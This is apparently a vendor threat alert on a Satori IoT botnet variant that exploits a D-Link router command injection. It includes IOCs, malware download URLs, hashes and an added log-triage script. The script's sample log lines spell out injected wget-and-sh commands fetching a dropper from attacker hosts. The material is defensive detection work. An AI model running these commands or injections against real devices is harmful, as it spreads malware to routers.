Satori IoT Botnet Variant



Abstract

On June 15, Radware’s deception network detected an upsurge of malicious activity scanning and infecting a variety of IoT devices to take advantage of recently discovered device exploits. The previously unseen payload is delivered by the infamous Satori botnet, this time propagating in worm fashion: each infected device scans for and infects further devices. Radware observed an exponential increase in the number of attack sources spread all over the world, peaking at over 2,500 attackers in a 24-hour period.


Figure 1: D-Link exploitation attempts

Satori is a Mirai-based botnet, first discovered by security researchers from Qihoo 360 Netlab, who also published an in-depth analysis of this new Satori variant in their June 15th post. The new variant infects D-Link DSL-2750B routers and also scans for vulnerable XiongMai uc-httpd 1.0.0 devices, which has caused a surge in port scanning activity on ports 80, 8000 and 8080. This Satori variant also carries DDoS capabilities and has been reported to launch several DDoS attacks.

Background

Radware’s Threat Research team witnessed thousands of IPs trying to infect our honeypots at a high rate, using a previously unseen payload.


Figure 2: Distribution of infections by country


Figure 3: Exponential increase in attack sources on June 16

Attack Methods

This attack exploits an unauthenticated OS command injection (remote code execution) vulnerability in the D-Link DSL-2750B router (see the references below), causing the router to run a wget command that downloads a remote script hosted on a web server at 185.62.190.191.


Figure 4: Downloading a remote script from the C2


Figure 5: Content of the download script hosted at hxxp://185.62.190.191/r


Figure 6: Full exploit body, including the 'Hello world' User-Agent
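Added example, not code from the Radware alert: a triage script for honeypot or router web-server access logs that flags the behaviour described above (a request parameter carrying shell metacharacters followed by a wget/curl fetch of a remote dropper, plus the 'Hello world' User-Agent) and matches the extracted download hosts and any recovered-file MD5s against the IOCs listed in this alert. The log format (Apache/nginx combined log), the endpoint /cgi-bin/example.cgi and the sample lines are constructed assumptions; the alert does not give the vulnerable D-Link request path, so the script keys on the injection-plus-fetch pattern rather than on a specific URL.

```python
import re
from urllib.parse import unquote, urlsplit

# Infrastructure indicators from the IOC table of this alert.
IOC_HOSTS = {
    "185.62.190.191": "Satori downloader",
    "95.215.62.169": "Satori C2 (download server since June 19)",
    "180.101.204.161": "Satori report server",
    "123.207.251.95": "Satori binary host",
    "r.rippr.cc": "Satori reporter (DNS TXT)",
    "i.rippr.cc": "Satori C2 (DNS TXT)",
}
# MD5 hashes of the dropper script and bot binaries from the IOC table.
IOC_MD5 = set("""
e193a58b317a7b44622efe57508eecc4 e4bd8dd1f44a81f27b8a7ef458345e18 08eedfc7576a1373375c1844cd7022d3
a1497029e35abe90409b52ef4bd984e0 974ecf6c95ee99da6ce3ee8a1492b2e4 f6568772b36064f3bb58ac3aec09d30e
99f13d801c40f23b19a07c6c77402095 e337d9c99bfe2feef8949f6563c57062 f8d1d92e9b74445f2a0d7f1feb78d639
656f4a61cf29f3af54affde4fccb5fd0 31a40e95b605a93f702e4aa0092380b9 426f8281d6599c9489057af1678ce468
44133462bd9653da097220157b1c0c61 476cd802889049e3d492b8fb7c5d09ed bdf1a0ec31f130e959adafffb6014cce
""".split())

# Combined log format (Apache/nginx style); the honeypot export is assumed to use it.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Shell metacharacters that end the legitimate parameter value and start an injected command.
INJECTION_SEP = re.compile(r"[;|`\n]|\$\(|&&")
# A download command and its arguments, up to the next command separator.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b(?P<args>[^;|&`\n]*)", re.I)
# Token that is a URL, bare IPv4 address or hostname, optionally with port and path.
URLISH = re.compile(
    r"^(?:https?://)?(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\d+)?(?:/\S*)?$", re.I
)

def decode_target(target, rounds=3):
    """URL-decode repeatedly: exploit payloads are sometimes double-encoded."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def extract_fetch_urls(command):
    """Return the URLs passed to wget/curl in an injected command, whatever the option order."""
    urls = []
    for m in FETCH_RE.finditer(command):
        for tok in m.group("args").split():
            if not tok.startswith("-") and URLISH.match(tok):
                urls.append(tok if "://" in tok else "http://" + tok)
    return urls

def analyze_line(line):
    """Classify one access-log line; returns None when the line is not in combined log format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = decode_target(m.group("target")).partition("?")
    injected = INJECTION_SEP.search(query) is not None
    fetch_urls = extract_fetch_urls(query) if injected else []
    hosts = {urlsplit(u).hostname for u in fetch_urls}
    iocs = sorted(IOC_HOSTS[h] for h in hosts if h in IOC_HOSTS)
    hello_world_ua = m.group("ua") == "Hello world"
    if injected and fetch_urls:
        verdict = "exploit attempt: command injection fetching a remote dropper"
    elif injected or hello_world_ua:
        verdict = "suspicious: shell metacharacters or 'Hello world' User-Agent"
    else:
        verdict = "clean"
    return {"src": m.group("src"), "path": path, "fetch_urls": fetch_urls,
            "iocs": iocs, "hello_world_ua": hello_world_ua, "verdict": verdict}

def match_hash(md5hex):
    """True if the MD5 of a recovered file (e.g. from /tmp on a device) is a known Satori artifact."""
    return md5hex.lower() in IOC_MD5

def triage(lines):
    return [r for r in (analyze_line(l) for l in lines) if r is not None]

# Constructed sample lines. The endpoint /cgi-bin/example.cgi and the source addresses are
# placeholders; this alert does not give the vulnerable D-Link request path.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jun/2018:03:14:22 +0000] "GET /cgi-bin/example.cgi?param=aa%20%27aa%27;'
    'wget%20http://185.62.190.191/r%20-O%20/tmp/r;sh%20/tmp/r HTTP/1.1" 200 12 "-" "Hello world"',
    '198.51.100.9 - - [19/Jun/2018:11:02:05 +0000] "GET /cgi-bin/example.cgi?param=x%7Cwget%20-q'
    '%20-O%20/tmp/r%2095.215.62.169/r%7Csh%20/tmp/r HTTP/1.1" 200 12 "-" "Hello world"',
    '203.0.113.8 - - [16/Jun/2018:03:14:25 +0000] "GET / HTTP/1.1" 404 0 "-" "Hello world"',
    '192.0.2.44 - - [16/Jun/2018:03:15:00 +0000] "GET /index.html?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(f"{r['src']:<14} {r['verdict']}  {r['fetch_urls']}  {r['iocs']}")
```

Pipe real log lines into triage() instead of SAMPLE_LOG to run it on a honeypot export. The injection check runs on the decoded query string so that percent-encoded or double-encoded payloads are not missed, and the fetch-URL extraction skips option tokens, so it catches both "wget URL -O file" and "wget -O file URL" orderings. A hit on a 'Hello world' User-Agent alone is reported as suspicious rather than as an exploit, since the same agent string may also appear on plain scanning requests.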

At the time of writing, no CVE had been assigned to this D-Link vulnerability, even though it was publicly disclosed over two years ago (see the table below).

Date        Description / Reference
2018-06-08  XiongMai uc-httpd 1.0.0 - Buffer Overflow (CVE-2018-10088)
            https://www.exploit-db.com/exploits/44864/
2018-05-25  Metasploit module - D-Link DSL-2750B OS Command Injection
            https://www.exploit-db.com/exploits/44760/
2017-01-21  D-LINK ROUTER DSL-2750B FIRMWARE 1.01 TO 1.03 - RCE NO AUTH
            http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/
2016-02-05  D-Link router DSL-2750B firmware 1.01 to 1.03 - remote command execution no auth required
            http://seclists.org/fulldisclosure/2016/Feb/53

Denial of Service

As Satori originated from the Mirai botnet, it features some of Mirai's original attack libraries and includes the following vectors, each of which can be launched from the infected IoT devices simultaneously:

  • UDP Flood
  • SYN Flood
  • TCP_ACK Flood
  • GRE Flood

At the time of writing, the original download server (185.62.190.191) had been taken down. Less than a day later, new variants started to hit our honeypots, downloading updated binaries from 95.215.62.169, the same server used as the Satori C2. We have reported the infrastructure and uploaded the binaries to VirusTotal.


Figure 7: VirusTotal detection of new Satori variants


Figure 8: Content of new download script hosted at hxxp://95.215.62.169/r

IOCs / Hashes

Indicator           Role                                                    Status
185.62.190.191      Satori downloader                                       Currently not accessible
180.101.204.161     Satori report server
r.rippr.cc          Satori reporter, listed in this host's DNS TXT record   Currently not accessible
95.215.62.169:5600  Satori C2                                               June 19 update: also used as download server
i.rippr.cc          Satori C2, listed in this host's DNS TXT record         Currently not accessible

MD5                               URL                                   Note
e4bd8dd1f44a81f27b8a7ef458345e18  http://95.215.62.169/arm.bot.le       Last-Modified: Tue, 19 Jun 2018 10:17:44 GMT
08eedfc7576a1373375c1844cd7022d3  http://95.215.62.169/mips.bot.be      Last-Modified: Tue, 19 Jun 2018 10:17:52 GMT
a1497029e35abe90409b52ef4bd984e0  http://95.215.62.169/mipsel.bot.le    Last-Modified: Tue, 19 Jun 2018 10:17:52 GMT
974ecf6c95ee99da6ce3ee8a1492b2e4  http://95.215.62.169/arm7.bot.le      Last-Modified: Tue, 19 Jun 2018 10:17:46 GMT
f6568772b36064f3bb58ac3aec09d30e  http://123.207.251.95:80/bins/arm     Last-Modified: Wed, 13 Jun 2018 22:57:01 GMT
f6568772b36064f3bb58ac3aec09d30e  http://123.207.251.95:80/bins/arm7    Last-Modified: Wed, 13 Jun 2018 22:56:44 GMT
99f13d801c40f23b19a07c6c77402095  http://123.207.251.95:80/bins/mpsl    Last-Modified: Wed, 13 Jun 2018 22:57:27 GMT
e337d9c99bfe2feef8949f6563c57062  http://123.207.251.95:80/bins/arm7    Last-Modified: Wed, 13 Jun 2018 22:56:44 GMT
f8d1d92e9b74445f2a0d7f1feb78d639  http://123.207.251.95:80/bins/arm     Last-Modified: Wed, 13 Jun 2018 22:57:01 GMT
e337d9c99bfe2feef8949f6563c57062  http://185.62.190.191/arm7.bot.le     Currently not accessible
99f13d801c40f23b19a07c6c77402095  http://185.62.190.191/mipsel.bot.le   Currently not accessible
f6568772b36064f3bb58ac3aec09d30e  http://185.62.190.191/arm.bot.le      Currently not accessible
f8d1d92e9b74445f2a0d7f1feb78d639  http://185.62.190.191/arm.bot.le      Currently not accessible
656f4a61cf29f3af54affde4fccb5fd0  http://185.62.190.191/x86_64.bot.le   Currently not accessible
31a40e95b605a93f702e4aa0092380b9  http://185.62.190.191/i686.bot.le     Currently not accessible
426f8281d6599c9489057af1678ce468  http://185.62.190.191/arm7.bot.le     Currently not accessible
44133462bd9653da097220157b1c0c61  http://185.62.190.191/arm.bot.le      Currently not accessible
476cd802889049e3d492b8fb7c5d09ed  http://185.62.190.191/mipsel.bot.le   Currently not accessible
bdf1a0ec31f130e959adafffb6014cce  http://185.62.190.191/x86_64.bot.le   Currently not accessible
e193a58b317a7b44622efe57508eecc4  http://185.62.190.191/r               Currently not accessible

Mitigation Recommendations

Defending against an outbreak that spreads this quickly requires a threat intelligence service that monitors active threats and provides actionable information in real time. Radware’s ERT Active Attackers Feed automatically correlates and qualifies discoveries based on information from Radware’s global detection network and feeds Radware’s application and network security devices with this intelligence for automated blocking of the known attackers. In addition, the Security Update Service (SUS) makes sure customers have signatures for such known vulnerabilities.

Radware Customers: If you are subscribed to our Active Attackers Feed or SUS, you are protected.

Effective DDoS Protection Essentials

  • Hybrid DDoS Protection - On-premise and cloud DDoS protection for real-time DDoS attack prevention that also addresses high volume attacks and protects from pipe saturation
  • Behavioral-Based Detection - Quickly and accurately identify and block anomalies while allowing legitimate traffic through
  • Real-Time Signature Creation - Promptly protect from unknown threats and zero-day attacks
  • A Cyber-Security Emergency Response Plan - A dedicated emergency team of experts who have experience with Internet of Things security and handling IoT outbreaks
  • Intelligence on Active Threat Actors – high-fidelity, correlated and analyzed data for preemptive protection against currently active known attackers.

For further network and application protection measures, Radware urges companies to inspect and patch their network in order to defend against risks and threats.

Under Attack and in Need of Expert Emergency Assistance? Radware Can Help

Radware offers a service to help respond to security emergencies, neutralize the risk and better safeguard operations before irreparable damages occur. If you’re under DDoS attack or malware outbreak and in need of emergency assistance, contact us with the code "Red Button."

